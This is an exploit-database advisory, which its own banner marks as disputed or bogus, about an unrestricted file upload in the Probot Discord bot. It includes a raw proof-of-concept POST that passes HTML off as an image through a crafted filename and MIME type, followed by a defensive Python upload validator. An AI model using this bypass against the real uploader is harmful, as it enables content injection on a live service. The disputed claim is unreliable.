WARNING! Fake news / Disputed / BOGUS

Discord Probot Arbitrary File Upload

2021.02.09
Credit: thelastvvv
Risk: High
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Discord Probot - Unrestricted File Upload
# Google Dork: N/A
# Date: 2021-02-08
# Exploit Author: ThelastVvV
# Vendor Homepage: probot.io
# Version: Version 2021
# Tested on: Debian 5.7.10-1parrot2
# CVE: CVE-2021-26918

About:
Probot is a highly customizable multipurpose Discord bot for welcome images, in-depth logs, social commands, music, moderation and many more ...

# Description:
An attacker can access the Probot dashboard and use the image uploader in the welcomer tab. The attacker can upload many file types because of unrestricted file upload: the restriction can be bypassed by changing the multipart/form-data POST request to carry a specially crafted filename or MIME type.

# PoC:

POST / HTTP/1.1
Host: uploader.probot.io
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length: 333
Origin: https://probot.io
DNT: 1
Connection: close
Referer: https://probot.io/server/""/welcomer

-----------------------------
Content-Disposition: form-data; name="file"; filename="ste.html.jpg"
Content-Type: text/html

<!DOCTYPE html>
<html>
<head>
<title>bypasss</title>
</head>
<body>
<div>bypass</div>
</body>
</html>
-------------------------------

Note: the link to the file is generated depending on the content type, in this case .html

# Impact
Unrestricted file uploads can be abused to exploit other vulnerable sections of an application when a file on the same or a trusted server is needed (this can in turn lead to client-side or server-side attacks).

# Solution
File types should be restricted to only jpg, png, jpeg (text/img)
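One way to implement the restriction described under Solution, as an added example that is not code from the advisory or from Probot: the server decides the type from the file's leading bytes and never from the client-supplied filename or Content-Type. The function names, the size limit and the sample inputs are assumptions constructed for illustration.

```python
import secrets

# Allowed formats: leading magic bytes -> (stored extension, served Content-Type)
MAGIC = {
    b"\xff\xd8\xff": (".jpg", "image/jpeg"),
    b"\x89PNG\r\n\x1a\n": (".png", "image/png"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed upload size limit


class UploadRejected(ValueError):
    """Raised when an upload fails server-side validation."""


def sniff_image(data: bytes):
    """Return (extension, content_type) for an allowed image, else None."""
    for magic, info in MAGIC.items():
        if data.startswith(magic):
            return info
    return None


def accept_upload(client_filename: str, client_type: str, data: bytes):
    """Return (stored_name, served_type) or raise UploadRejected."""
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("empty or oversized upload")
    detected = sniff_image(data)
    if detected is None:
        raise UploadRejected("content is not a JPEG or PNG image")
    ext, served_type = detected
    # Defence in depth: the declared type must agree with the detected one.
    if client_type.split(";")[0].strip().lower() != served_type:
        raise UploadRejected("declared Content-Type does not match content")
    # client_filename is deliberately ignored: the stored name is random and
    # its extension comes from the detected type, never from the request.
    return secrets.token_hex(16) + ext, served_type


# Constructed samples: the HTML body from the PoC above and a minimal PNG header.
POC_BODY = b"<!DOCTYPE html> <html> <body> <div>bypass</div> </body> </html>"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name, ctype, body in [("ste.html.jpg", "text/html", POC_BODY),
                              ("logo.png", "image/png", PNG_SAMPLE)]:
        try:
            print(name, "->", accept_upload(name, ctype, body))
        except UploadRejected as exc:
            print(name, "-> rejected:", exc)
```

Magic-byte checks do not stop image/HTML polyglots on their own, so stored files should still be served with the detected Content-Type and `X-Content-Type-Options: nosniff`.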

